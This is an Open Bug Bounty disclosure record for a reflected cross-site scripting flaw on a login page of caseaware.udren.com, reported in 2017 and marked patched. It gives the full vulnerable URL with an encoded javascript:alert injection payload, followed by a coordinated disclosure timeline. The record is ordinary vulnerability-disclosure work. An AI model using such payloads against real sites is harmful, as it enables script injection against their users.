caseaware.udren.com XSS vulnerability

2017-04-27T06:46:00
ID OBB:228262
Type openbugbounty
Reporter justpentest
Modified 2017-10-17T13:58:00

Description

Vulnerable URL:
https://caseaware.udren.com:4322/login.php?mid=0&usr;=admin%27%3E%3Ca%20HREF=%22javascript:alert(%27OPENBUGBOUNTY%27)%22%3EClick_ME%3C%27
Details:

Description| Value
---|---
Patched:| Yes, at 17.10.2017
Latest check for patch:| 17.10.2017 13:58 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check caseaware.udren.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 27 April, 2017 06:46 GMT
Vulnerability existence verified and confirmed| 27 April, 2017 10:09 GMT
Generic security notifications sent to website owner| 27 April, 2017 10:09 GMT
Notification sent to subscribers (without technical details)| 27 April, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 28 April, 2017 15:32 GMT
Vulnerability patched by the website owner| 17 October, 2017 13:58 GMT